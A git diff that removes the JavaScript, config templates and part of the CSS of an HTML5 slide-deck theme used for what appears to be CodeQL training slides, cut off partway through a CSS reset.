-(function(window) { - -var ORIGIN_ = location.protocol + '//' + location.host; - -function SlideController() { - this.popup = null; - this.isPopup = window.opener; - - if (this.setupDone()) { - window.addEventListener('message', this.onMessage_.bind(this), false); - - // Close popups if we reload the main window. - window.addEventListener('beforeunload', function(e) { - if (this.popup) { - this.popup.close(); - } - }.bind(this), false); - } -} - -SlideController.PRESENTER_MODE_PARAM = 'presentme'; - -SlideController.prototype.setupDone = function() { - var params = location.search.substring(1).split('&').map(function(el) { - return el.split('='); - }); - - var presentMe = null; - for (var i = 0, param; param = params[i]; ++i) { - if (param[0].toLowerCase() == SlideController.PRESENTER_MODE_PARAM) { - presentMe = param[1] == 'true'; - break; - } - } - - if (presentMe !== null) { - localStorage.ENABLE_PRESENTOR_MODE = presentMe; - // TODO: use window.history.pushState to update URL instead of the redirect. - if (window.history.replaceState) { - window.history.replaceState({}, '', location.pathname); - } else { - location.replace(location.pathname); - return false; - } - } - - var enablePresenterMode = localStorage.getItem('ENABLE_PRESENTOR_MODE'); - if (enablePresenterMode && JSON.parse(enablePresenterMode)) { - // Only open popup from main deck. Don't want recursive popup opening! - if (!this.isPopup) { - var opts = 'menubar=no,location=yes,resizable=yes,scrollbars=no,status=no'; - this.popup = window.open(location.href, 'mywindow', opts); - - // Loading in the popup? Trigger the hotkey for turning presenter mode on. - this.popup.addEventListener('load', function(e) { - var evt = this.popup.document.createEvent('Event'); - evt.initEvent('keydown', true, true); - evt.keyCode = 'P'.charCodeAt(0); - this.popup.document.dispatchEvent(evt); - // this.popup.document.body.classList.add('with-notes'); - // document.body.classList.add('popup'); - }.bind(this), false); - } - } - - return true; -} - -SlideController.prototype.onMessage_ = function(e) { - var data = e.data; - - // Restrict messages to being from this origin. Allow local developmet - // from file:// though. - // TODO: It would be dope if FF implemented location.origin! - if (e.origin != ORIGIN_ && ORIGIN_.indexOf('file://') != 0) { - alert('Someone tried to postMessage from an unknown origin'); - return; - } - - // if (e.source.location.hostname != 'localhost') { - // alert('Someone tried to postMessage from an unknown origin'); - // return; - // } - - if ('keyCode' in data) { - var evt = document.createEvent('Event'); - evt.initEvent('keydown', true, true); - evt.keyCode = data.keyCode; - document.dispatchEvent(evt); - } -}; - -SlideController.prototype.sendMsg = function(msg) { - // // Send message to popup window. - // if (this.popup) { - // this.popup.postMessage(msg, ORIGIN_); - // } - - // Send message to main window. - if (this.isPopup) { - // TODO: It would be dope if FF implemented location.origin. - window.opener.postMessage(msg, '*'); - } -}; - -window.SlideController = SlideController; - -})(window); - diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-deck-instantiate.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-deck-instantiate.js deleted file mode 100644 index 08b2ebdc7fd4..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-deck-instantiate.js +++ /dev/null @@ -1,13 +0,0 @@ - -// Polyfill missing APIs (if we need to), then create the slide deck. -// iOS < 5 needs classList, dataset, and window.matchMedia. Modernizr contains -// the last one. -(function() { - Modernizr.load({ - test: !!document.body.classList && !!document.body.dataset, - nope: ['js/polyfills/classList.min.js', 'js/polyfills/dataset.min.js'], - complete: function() { - window.slidedeck = new SlideDeck(); - } - }); -})(); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-deck.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-deck.js deleted file mode 100644 index bc2b33607669..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-deck.js +++ /dev/null @@ -1,897 +0,0 @@ -/** - * @authors Luke Mahe - * @authors Eric Bidelman - * @fileoverview TODO - */ -document.cancelFullScreen = document.webkitCancelFullScreen || - document.mozCancelFullScreen; - -/** - * @constructor - */ -function SlideDeck(el) { - this.curSlide_ = 0; - this.prevSlide_ = 0; - this.config_ = null; - this.container = el || document.querySelector('slides'); - this.slides = []; - this.controller = null; - - this.getCurrentSlideFromHash_(); - - // Call this explicitly. Modernizr.load won't be done until after DOM load. - this.onDomLoaded_.bind(this)(); -} - -/** - * @const - * @private - */ -SlideDeck.prototype.SLIDE_CLASSES_ = [ - 'far-past', 'past', 'current', 'next', 'far-next']; - -/** - * @const - * @private - */ -SlideDeck.prototype.CSS_DIR_ = '_static/theme/css/'; - - -/** - * @private - */ -SlideDeck.prototype.findSlideById = function(title_id) { - // Return the 1-base index of the Slide with id ``title_id`` - // - // The index must be 1-based, as it's passed to code which assumes - // it was specified as the location fragment. - - slideEls = document.querySelectorAll('slides > slide'); - - for (var i = 0; i < slideEls.length; i++) { - if (slideEls.item(i).id == title_id) { - return i + 1; - } - } - - // no match on a slide, perhaps it's an explicit reference? - var - target_link = document.querySelector("span[id='" + title_id + "']"), - // XXX this is pretty strict, may need to be more flexible in the future - slide = (target_link && target_link.parentNode); - - if (slide && slide.tagName == 'SLIDE') { - return this.findSlideById(slide.id); - } - - return false; - -}; - -/** - * @private - */ -SlideDeck.prototype.getCurrentSlideFromHash_ = function() { - var slideNo = parseInt(document.location.hash.substr(1)); - - if (slideNo && isNaN(slideNo)) { - // must be a section title reference - slideNo = this.findSlideById(location.hash.substr(1)); - } - - if (slideNo) { - this.curSlide_ = slideNo - 1; - } else { - this.curSlide_ = 0; - } -}; - -/** - * @param {number} slideNo - */ -SlideDeck.prototype.loadSlide = function(slideNo) { - if (slideNo) { - this.curSlide_ = slideNo - 1; - this.updateSlides_(); - } -}; - -/** - * @private - */ -SlideDeck.prototype.onDomLoaded_ = function(e) { - document.body.classList.add('loaded'); // Add loaded class for templates to use. - - this.slides = this.container.querySelectorAll('slide:not([hidden]):not(.hidden):not(.backdrop)'); - - // If we're on a smartphone, apply special sauce. - if (Modernizr.mq('only screen and (max-device-width: 480px)')) { - // var style = document.createElement('link'); - // style.rel = 'stylesheet'; - // style.type = 'text/css'; - // style.href = this.CSS_DIR_ + 'phone.css'; - // document.querySelector('head').appendChild(style); - - // No need for widescreen layout on a phone. - this.container.classList.remove('layout-widescreen'); - } - - this.loadConfig_(SLIDE_CONFIG); - this.addEventListeners_(); - this.updateSlides_(); - - // Add slide numbers and total slide count metadata to each slide. - var that = this; - for (var i = 0, slide; slide = this.slides[i]; ++i) { - slide.dataset.slideNum = i + 1; - slide.dataset.totalSlides = this.slides.length; - - slide.addEventListener('click', function(e) { - if (document.body.classList.contains('overview')) { - that.loadSlide(this.dataset.slideNum); - e.preventDefault(); - window.setTimeout(function() { - that.toggleOverview(); - }, 500); - } - }, false); - } - - // Note: this needs to come after addEventListeners_(), which adds a - // 'keydown' listener that this controller relies on. - - // Modernizr.touch isn't a sufficient check for devices that support both - // touch and mouse. Create the controller in all cases. - // // Also, no need to set this up if we're on mobile. - // if (!Modernizr.touch) { - this.controller = new SlideController(this); - if (this.controller.isPopup) { - document.body.classList.add('popup'); - } - //} -}; - -/** - * @private - */ -SlideDeck.prototype.addEventListeners_ = function() { - document.addEventListener('keydown', this.onBodyKeyDown_.bind(this), false); - window.addEventListener('popstate', this.onPopState_.bind(this), false); - - // var transEndEventNames = { - // 'WebkitTransition': 'webkitTransitionEnd', - // 'MozTransition': 'transitionend', - // 'OTransition': 'oTransitionEnd', - // 'msTransition': 'MSTransitionEnd', - // 'transition': 'transitionend' - // }; - // - // // Find the correct transitionEnd vendor prefix. - // window.transEndEventName = transEndEventNames[ - // Modernizr.prefixed('transition')]; - // - // // When slides are done transitioning, kickoff loading iframes. - // // Note: we're only looking at a single transition (on the slide). This - // // doesn't include autobuilds the slides may have. Also, if the slide - // // transitions on multiple properties (e.g. not just 'all'), this doesn't - // // handle that case. - // this.container.addEventListener(transEndEventName, function(e) { - // this.enableSlideFrames_(this.curSlide_); - // }.bind(this), false); - - // document.addEventListener('slideenter', function(e) { - // var slide = e.target; - // window.setTimeout(function() { - // this.enableSlideFrames_(e.slideNumber); - // this.enableSlideFrames_(e.slideNumber + 1); - // }.bind(this), 300); - // }.bind(this), false); -}; - -/** - * @private - * @param {Event} e The pop event. - */ -SlideDeck.prototype.onPopState_ = function(e) { - if (e.state != null) { - this.curSlide_ = e.state; - this.updateSlides_(true); - } -}; - -/** - * @param {Event} e - */ -SlideDeck.prototype.onBodyKeyDown_ = function(e) { - if (/^(input|textarea)$/i.test(e.target.nodeName) || - e.target.isContentEditable) { - return; - } - - // Forward keydowns to the main slides if we're the popup. - if (this.controller && this.controller.isPopup) { - this.controller.sendMsg({keyCode: e.keyCode}); - } - - switch (e.keyCode) { - case 13: // Enter - if (document.body.classList.contains('overview')) { - this.toggleOverview(); - } - break; - - case 39: // right arrow - case 32: // space - case 34: // PgDn - this.nextSlide(); - e.preventDefault(); - break; - - case 37: // left arrow - case 8: // Backspace - case 33: // PgUp - this.prevSlide(); - e.preventDefault(); - break; - - case 40: // down arrow - this.nextSlide(); - e.preventDefault(); - break; - - case 38: // up arrow - this.prevSlide(); - e.preventDefault(); - break; - - case 72: // H: Toggle code highlighting - document.body.classList.toggle('highlight-code'); - break; - - case 79: // O: Toggle overview - this.toggleOverview(); - break; - - case 80: // P - if (this.controller && this.controller.isPopup) { - document.body.classList.toggle('with-notes'); - } else if (this.controller && !this.controller.popup) { - document.body.classList.toggle('with-notes'); - } - break; - - case 82: // R - // TODO: implement refresh on main slides when popup is refreshed. - break; - - case 27: // ESC: Hide notes and highlighting - document.body.classList.remove('with-notes'); - document.body.classList.remove('highlight-code'); - - if (document.body.classList.contains('overview')) { - this.toggleOverview(); - } - break; - - case 70: // F: Toggle fullscreen - // Only respect 'f' on body. Don't want to capture keys from an . - // Also, ignore browser's fullscreen shortcut (cmd+shift+f) so we don't - // get trapped in fullscreen! - if (e.target == document.body && !(e.shiftKey && e.metaKey)) { - if (document.mozFullScreen !== undefined && !document.mozFullScreen) { - document.body.mozRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT); - } else if (document.webkitIsFullScreen !== undefined && !document.webkitIsFullScreen) { - document.body.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT); - } else { - document.cancelFullScreen(); - } - } - break; - - case 87: // W: Toggle widescreen - // Only respect 'w' on body. Don't want to capture keys from an . - if (e.target == document.body && !(e.shiftKey && e.metaKey)) { - this.container.classList.toggle('layout-widescreen'); - } - break; - } -}; - -/** - * - */ -SlideDeck.prototype.focusOverview_ = function() { - var overview = document.body.classList.contains('overview'); - - for (var i = 0, slide; slide = this.slides[i]; i++) { - slide.style[Modernizr.prefixed('transform')] = overview ? - 'translateZ(-2500px) translate(' + (( i - this.curSlide_ ) * 105) + - '%, 0%)' : ''; - } -}; - -/** - */ -SlideDeck.prototype.toggleOverview = function() { - document.body.classList.toggle('overview'); - - this.focusOverview_(); -}; - -/** - * @private - */ -SlideDeck.prototype.loadConfig_ = function(config) { - if (!config) { - return; - } - - this.config_ = config; - - var settings = this.config_.settings; - - this.loadTheme_(settings.theme || []); - - if (settings.favIcon) { - this.addFavIcon_(settings.favIcon); - } - - // Prettyprint. Default to on. - if (!!!('usePrettify' in settings) || settings.usePrettify) { - prettyPrint(); - } - - if (settings.analytics) { - this.loadAnalytics_(); - } - - if (settings.fonts) { - this.addFonts_(settings.fonts); - } - - // Builds. Default to on. - if (!!!('useBuilds' in settings) || settings.useBuilds) { - this.makeBuildLists_(); - } - - if (settings.title) { - document.title = settings.title.replace(//, ' '); - if (settings.eventInfo && settings.eventInfo.title) { - document.title += ' - ' + settings.eventInfo.title; - } - document.querySelector('[data-config-title]').innerHTML = settings.title; - } - - if (settings.subtitle) { - document.querySelector('[data-config-subtitle]').innerHTML = settings.subtitle; - } - - if (this.config_.presenters) { - var presenters = this.config_.presenters; - var dataConfigContact = document.querySelector('[data-config-contact]'); - - var html = []; - if (presenters.length == 1) { - var p = presenters[0]; - - var presenterTitle = [p.name]; - if (p.company) { - presenterTitle.push(p.company); - } - html = presenterTitle.join(' - ') + '
    '; - - var gplus = p.gplus ? 'g+' + p.gplus.replace(/https?:\/\//, '') + '' : ''; - - var twitter = p.twitter ? 'twitter' + - '' + - p.twitter + '' : ''; - - var www = p.www ? 'www' + p.www.replace(/https?:\/\//, '') + '' : ''; - - var github = p.github ? 'github' + p.github.replace(/https?:\/\//, '') + '' : ''; - - var html2 = [gplus, twitter, www, github].join('
    '); - - if (dataConfigContact) { - dataConfigContact.innerHTML = html2; - } - } else { - for (var i = 0, p; p = presenters[i]; ++i) { - html.push(p.name + ' - ' + p.company); - } - html = html.join('
    '); - if (dataConfigContact) { - dataConfigContact.innerHTML = html; - } - } - - var dataConfigPresenter = document.querySelector('[data-config-presenter]'); - if (dataConfigPresenter) { - dataConfigPresenter.innerHTML = html; - if (settings.eventInfo) { - var date = settings.eventInfo.date; - var dateInfo = date ? ' - ' : ''; - dataConfigPresenter.innerHTML += settings.eventInfo.title + dateInfo; - } - } - } - - /* Left/Right tap areas. Default to including. */ - if (!!!('enableSlideAreas' in settings) || settings.enableSlideAreas) { - var el = document.createElement('div'); - el.classList.add('slide-area'); - el.id = 'prev-slide-area'; - el.addEventListener('click', this.prevSlide.bind(this,undefined), false); - this.container.appendChild(el); - - var el = document.createElement('div'); - el.classList.add('slide-area'); - el.id = 'next-slide-area'; - el.addEventListener('click', this.nextSlide.bind(this,undefined), false); - this.container.appendChild(el); - } - - if (Modernizr.touch && (!!!('enableTouch' in settings) || - settings.enableTouch)) { - var self = this; - - // Note: this prevents mobile zoom in/out but prevents iOS from doing - // it's crazy scroll over effect and disaligning the slides. - window.addEventListener('touchstart', function(e) { - e.preventDefault(); - }, false); - - var hammer = new Hammer(this.container); - hammer.ondragend = function(e) { - if (e.direction == 'right' || e.direction == 'down') { - self.prevSlide(); - } else if (e.direction == 'left' || e.direction == 'up') { - self.nextSlide(); - } - }; - } -}; - -/** - * @private - * @param {Array.} fonts - */ -SlideDeck.prototype.addFonts_ = function(fonts) { - var el = document.createElement('link'); - el.rel = 'stylesheet'; - el.href = ('https:' == document.location.protocol ? 'https' : 'http') + - '://fonts.googleapis.com/css?family=' + fonts.join('|') + '&v2'; - document.querySelector('head').appendChild(el); -}; - -/** - * @private - */ -SlideDeck.prototype.buildNextBuildItem_ = function() { - var slide = this.slides[this.curSlide_]; - var toBuild = slide.querySelector('.to-build'); - var built = slide.querySelector('.build-current'); - - if (built) { - built.classList.remove('build-current'); - if (built.classList.contains('fade')) { - built.classList.add('build-fade'); - } - } - - if (!toBuild) { - var items = slide.querySelectorAll('.build-fade'); - for (var j = 0, item; item = items[j]; j++) { - item.classList.remove('build-fade'); - } - return false; - } - - toBuild.classList.remove('to-build'); - toBuild.classList.add('build-current'); - - return true; -}; - -SlideDeck.prototype.buildNextItem_ = function() { - - var slide = this.slides[this.curSlide_]; - var built = slide.querySelectorAll('.build-current'); - - var buildItems = slide.querySelectorAll('[class*="build-item-"]'); - var show_items; - - // Remove the classes from the previously built item - if (built) { - for (var j = 0, built_item; built_item = built[j]; ++j) { - built_item.classList.remove('build-current'); - if (built_item.classList.contains('fade')) { - built_item.classList.add('build-fade'); - } - - if (built_item.getAttribute('data-build-show-only')) { - - if (built_item.getAttribute('data-build-class')) { - built_item.classList.remove( - built_item.getAttribute('data-build-class') - ); - } else { - built_item.classList.add('build-hide'); - } - } - }; - } - - if (slide._buildItems && slide._buildItems.length) { - while ((show_items = slide._buildItems.shift()) === undefined) {}; - if (show_items) { - - // show the next items - show_items.forEach(function(item, index, items) { - item.classList.remove('to-build'); - item.classList.add('build-current'); - - if (item.getAttribute('data-build-class')) { - item.classList.add(item.getAttribute('data-build-class')); - } - }); - - return true; - } - } - - return this.buildNextBuildItem_(); - -}; - -/** - * @param {boolean=} opt_dontPush - */ -SlideDeck.prototype.prevSlide = function(opt_dontPush) { - if (this.curSlide_ > 0) { - var bodyClassList = document.body.classList; - bodyClassList.remove('highlight-code'); - - // Toggle off speaker notes if they're showing when we move backwards on the - // main slides. If we're the speaker notes popup, leave them up. - if (this.controller && !this.controller.isPopup) { - bodyClassList.remove('with-notes'); - } else if (!this.controller) { - bodyClassList.remove('with-notes'); - } - - this.prevSlide_ = this.curSlide_--; - - this.updateSlides_(opt_dontPush); - } -}; - -/** - * @param {boolean=} opt_dontPush - */ -SlideDeck.prototype.nextSlide = function(opt_dontPush) { - if (!document.body.classList.contains('overview') && this.buildNextItem_()) { - return; - } - - if (this.curSlide_ < this.slides.length - 1) { - var bodyClassList = document.body.classList; - bodyClassList.remove('highlight-code'); - - // Toggle off speaker notes if they're showing when we advanced on the main - // slides. If we're the speaker notes popup, leave them up. - if (this.controller && !this.controller.isPopup) { - bodyClassList.remove('with-notes'); - } else if (!this.controller) { - bodyClassList.remove('with-notes'); - } - - this.prevSlide_ = this.curSlide_++; - - this.updateSlides_(opt_dontPush); - } -}; - -/* Slide events */ - -/** - * Triggered when a slide enter/leave event should be dispatched. - * - * @param {string} type The type of event to trigger - * (e.g. 'slideenter', 'slideleave'). - * @param {number} slideNo The index of the slide that is being left. - */ -SlideDeck.prototype.triggerSlideEvent = function(type, slideNo) { - var el = this.getSlideEl_(slideNo); - if (!el) { - return; - } - - // Call onslideenter/onslideleave if the attribute is defined on this slide. - var func = el.getAttribute(type); - if (func) { - new Function(func).call(el); // TODO: Don't use new Function() :( - } - - // Dispatch event to listeners setup using addEventListener. - var evt = document.createEvent('Event'); - evt.initEvent(type, true, true); - evt.slideNumber = slideNo + 1; // Make it readable - evt.slide = el; - - el.dispatchEvent(evt); -}; - -/** - * @private - */ -SlideDeck.prototype.updateSlides_ = function(opt_dontPush) { - var dontPush = opt_dontPush || false; - - var curSlide = this.curSlide_; - for (var i = 0; i < this.slides.length; ++i) { - switch (i) { - case curSlide - 2: - this.updateSlideClass_(i, 'far-past'); - break; - case curSlide - 1: - this.updateSlideClass_(i, 'past'); - break; - case curSlide: - this.updateSlideClass_(i, 'current'); - break; - case curSlide + 1: - this.updateSlideClass_(i, 'next'); - break; - case curSlide + 2: - this.updateSlideClass_(i, 'far-next'); - break; - default: - this.updateSlideClass_(i); - break; - } - }; - - this.triggerSlideEvent('slideleave', this.prevSlide_); - this.triggerSlideEvent('slideenter', curSlide); - -// window.setTimeout(this.disableSlideFrames_.bind(this, curSlide - 2), 301); -// -// this.enableSlideFrames_(curSlide - 1); // Previous slide. -// this.enableSlideFrames_(curSlide + 1); // Current slide. -// this.enableSlideFrames_(curSlide + 2); // Next slide. - - // Enable current slide's iframes (needed for page loat at current slide). - this.enableSlideFrames_(curSlide + 1); - - // No way to tell when all slide transitions + auto builds are done. - // Give ourselves a good buffer to preload the next slide's iframes. - window.setTimeout(this.enableSlideFrames_.bind(this, curSlide + 2), 1000); - - this.updateHash_(dontPush); - - if (document.body.classList.contains('overview')) { - this.focusOverview_(); - return; - } - -}; - -/** - * @private - * @param {number} slideNo - */ -SlideDeck.prototype.enableSlideFrames_ = function(slideNo) { - var el = this.slides[slideNo - 1]; - if (!el) { - return; - } - - var frames = el.querySelectorAll('iframe'); - for (var i = 0, frame; frame = frames[i]; i++) { - this.enableFrame_(frame); - } -}; - -/** - * @private - * @param {number} slideNo - */ -SlideDeck.prototype.enableFrame_ = function(frame) { - var src = frame.dataset.src; - if (src && frame.src != src) { - frame.src = src; - } -}; - -/** - * @private - * @param {number} slideNo - */ -SlideDeck.prototype.disableSlideFrames_ = function(slideNo) { - var el = this.slides[slideNo - 1]; - if (!el) { - return; - } - - var frames = el.querySelectorAll('iframe'); - for (var i = 0, frame; frame = frames[i]; i++) { - this.disableFrame_(frame); - } -}; - -/** - * @private - * @param {Node} frame - */ -SlideDeck.prototype.disableFrame_ = function(frame) { - frame.src = 'about:blank'; -}; - -/** - * @private - * @param {number} slideNo - */ -SlideDeck.prototype.getSlideEl_ = function(no) { - if ((no < 0) || (no >= this.slides.length)) { - return null; - } else { - return this.slides[no]; - } -}; - -/** - * @private - * @param {number} slideNo - * @param {string} className - */ -SlideDeck.prototype.updateSlideClass_ = function(slideNo, className) { - var el = this.getSlideEl_(slideNo); - - if (!el) { - return; - } - - if (className) { - el.classList.add(className); - } - - for (var i = 0, slideClass; slideClass = this.SLIDE_CLASSES_[i]; ++i) { - if (className != slideClass) { - el.classList.remove(slideClass); - } - } -}; - -/** - * @private - */ -SlideDeck.prototype.BUILD_ITEM_RE = /build-item-(\d+)(-class-(\w+))?(-only)?/; - -SlideDeck.prototype.makeBuildLists_ = function () { - for (var i = this.curSlide_, slide; slide = this.slides[i]; ++i) { - var items = slide.querySelectorAll('.build > *'); - - for (var j = 0, item; item = items[j]; ++j) { - if (item.classList) { - item.classList.add('to-build'); - if (item.parentNode.classList.contains('fade')) { - item.classList.add('fade'); - } - } - } - - var items = slide.querySelectorAll('[class*="build-item-"]'); - if (items.length) { - slide._buildItems = []; - }; - for (var j = 0, item; item = items[j]; ++j) { - if (item.classList) { - item.classList.add('to-build'); - if (!item.parentNode.classList.contains('build')) { - item.parentNode.classList.add('build'); - } - if (item.parentNode.classList.contains('fade')) { - item.classList.add('fade'); - } - } - - var build_info = this.BUILD_ITEM_RE.exec(item.classList), - build_index = build_info[1], - build_class = build_info[3], - build_only = build_info[4]; - - if (slide._buildItems[build_index] === undefined) { - slide._buildItems[build_index] = []; - } - slide._buildItems[build_index].push(item); - - if (build_class) { - item.setAttribute('data-build-class', build_class); - } - - if (build_only) { - // add the data-attribute - item.setAttribute('data-build-show-only', build_index); - } - - } - - } -}; - -/** - * @private - * @param {boolean} dontPush - */ -SlideDeck.prototype.updateHash_ = function(dontPush) { - if (!dontPush) { - var slideNo = this.curSlide_ + 1; - var hash = '#' + slideNo; - if (window.history.pushState) { - window.history.pushState(this.curSlide_, 'Slide ' + slideNo, hash); - } else { - window.location.replace(hash); - } - - // Record GA hit on this slide. - window['_gaq'] && window['_gaq'].push(['_trackPageview', - document.location.href]); - } -}; - - -/** - * @private - * @param {string} favIcon - */ -SlideDeck.prototype.addFavIcon_ = function(favIcon) { - var el = document.createElement('link'); - el.rel = 'icon'; - el.type = 'image/png'; - el.href = favIcon; - document.querySelector('head').appendChild(el); -}; - -/** - * @private - * @param {string} theme - */ -SlideDeck.prototype.loadTheme_ = function(theme) { - var styles = []; - if (theme.constructor.name === 'String') { - styles.push(theme); - } else { - styles = theme; - } - - for (var i = 0, style; themeUrl = styles[i]; i++) { - var style = document.createElement('link'); - style.rel = 'stylesheet'; - style.type = 'text/css'; - if (themeUrl.indexOf('http') == -1) { - style.href = this.CSS_DIR_ + themeUrl + '.css'; - } else { - style.href = themeUrl; - } - document.querySelector('head').appendChild(style); - } -}; - -/** - * @private - */ -SlideDeck.prototype.loadAnalytics_ = function() { - var _gaq = window['_gaq'] || []; - _gaq.push(['_setAccount', this.config_.settings.analytics]); - _gaq.push(['_trackPageview']); - - (function() { - var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; - ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; - var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); - })(); -}; diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-testing.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-testing.js deleted file mode 100644 index def9cb1b0140..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slide-testing.js +++ /dev/null @@ -1,6 +0,0 @@ -require(['order!modernizr.custom.45394', - 'order!prettify/prettify', 'order!hammer', 'order!slide-controller', - 'order!slide-deck', - 'order!slide-deck-instantiate'], function(someModule) { - -}); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slides.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slides.js deleted file mode 100644 index ba5a36993628..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/slides.js +++ /dev/null @@ -1,6 +0,0 @@ -require(['order!../slide_config', 'order!modernizr.custom.45394', - 'order!prettify/prettify', 'order!hammer', 'order!slide-controller', - 'order!slide-deck', - 'order!slide-deck-instantiate'], function(someModule) { - -}); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/slide_config.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/slide_config.js deleted file mode 100644 index 0d9b7c6f4d9d..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/slide_config.js +++ /dev/null @@ -1,40 +0,0 @@ -var SLIDE_CONFIG = { - // Slide settings - settings: { - title: 'Title Goes Here
    Up To Two Lines', - subtitle: 'Subtitle Goes Here', - //eventInfo: { - // title: 'Google I/O', - // date: '6/x/2013' - //}, - useBuilds: true, // Default: true. False will turn off slide animation builds. - usePrettify: true, // Default: true - enableSlideAreas: true, // Default: true. False turns off the click areas on either slide of the slides. - enableTouch: true, // Default: true. If touch support should enabled. Note: the device must support touch. - //analytics: 'UA-XXXXXXXX-1', // TODO: Using this breaks GA for some reason (probably requirejs). Update your tracking code in template.html instead. - favIcon: 'images/google_developers_logo_tiny.png', - fonts: [ - 'Open Sans:regular,semibold,italic,italicsemibold', - 'Source Code Pro' - ], - //theme: ['mytheme'], // Add your own custom themes or styles in /theme/css. Leave off the .css extension. - }, - - // Author information - presenters: [{ - name: 'Firstname Lastname', - company: 'Job Title
    Google', - gplus: 'http://plus.google.com/1234567890', - twitter: '@yourhandle', - www: 'http://www.you.com', - github: 'http://github.com/you' - }/*, { - name: 'Second Name', - company: 'Job Title, Google', - gplus: 'http://plus.google.com/1234567890', - twitter: '@yourhandle', - www: 'http://www.you.com', - github: 'http://github.com/you' - }*/] -}; - diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/slide_config.js_t b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/slide_config.js_t deleted file mode 100644 index 62339175d84f..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/slide_config.js_t +++ /dev/null @@ -1,27 +0,0 @@ -var SLIDE_CONFIG = { - // Slide settings - settings: { - title: '{{ docstitle|e }}', - subtitle: '{{ theme_subtitle|e }}', - //eventInfo: { - // title: 'Google I/O', - // date: '6/x/2013' - //}, - useBuilds: {{ theme_use_builds }}, // Default: true. False will turn off slide animation builds. - usePrettify: {{ theme_use_prettify }}, // Default: true - enableSlideAreas: {{ theme_enable_slide_areas }}, // Default: true. False turns off the click areas on either slide of the slides. - enableTouch: {{ theme_enable_touch }}, // Default: true. If touch support should enabled. Note: the device must support touch. - //analytics: 'UA-XXXXXXXX-1', // TODO: Using this breaks GA for some reason (probably requirejs). Update your tracking code in template.html instead. - favIcon: {{ theme_favicon }}, - fonts: [ - 'Open Sans:regular,semibold,italic,italicsemibold', - 'Source Code Pro' - ], - //theme: ['mytheme'], // Add your own custom themes or styles in /theme/css. Leave off the .css extension. - }, - - // Author information - presenters: {% if theme_presenters %}{{ theme_presenters|json }} - {% else %}[] - {% endif %} -}; diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/default.css b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/default.css deleted file mode 100644 index dad8b305ed6b..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/default.css +++ /dev/null @@ -1,1794 +0,0 @@ -@charset "UTF-8"; -/* line 5, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -html, body, div, span, applet, object, iframe, -h1, h2, h3, h4, h5, h6, p, blockquote, pre, -a, abbr, acronym, address, big, cite, code, -del, dfn, em, img, ins, kbd, q, s, samp, -small, strike, strong, sub, sup, tt, var, -b, u, i, center, -dl, dt, dd, ol, ul, li, -fieldset, form, label, legend, -table, caption, tbody, tfoot, thead, tr, th, td, -article, aside, canvas, details, embed, -figure, figcaption, footer, header, hgroup, -menu, nav, output, ruby, section, summary, -time, mark, audio, video { - margin: 0; - padding: 0; - border: 0; - font: inherit; - vertical-align: baseline; -} - -/* line 22, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -html { - line-height: 1; -} - -/* line 24, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -/*ol, ul { - list-style: none; -}*/ - -/* line 26, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -table { - border-collapse: collapse; - border-spacing: 0; -} - -/* line 28, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -caption, th, td { - text-align: left; - font-weight: normal; - vertical-align: middle; -} - -/* line 30, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -q { - quotes: none; - margin-left: 2%; - margin-right:2%; -} -/* line 103, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -q:before, q:after, blockquote:before, blockquote:after { - content: ""; - content: none; -} - -/* line 32, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -a img { - border: none; - display: block; - margin-left: auto; - margin-right: auto; -} - -/* line 116, ../../../../../../../../../../../Library/Ruby/Gems/2.0.0/gems/compass-core-1.0.3/stylesheets/compass/reset/_utilities.scss */ -article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { - display: block; -} - -/** - * Base SlideDeck Styles - */ -/* line 52, ../scss/_base.scss */ -html { - height: 100%; - overflow: hidden; -} - -/* line 57, ../scss/_base.scss */ -body { - margin: 0; - padding: 0; - opacity: 0; - height: 100%; - min-height: 740px; - width: 100%; - overflow: hidden; - color: 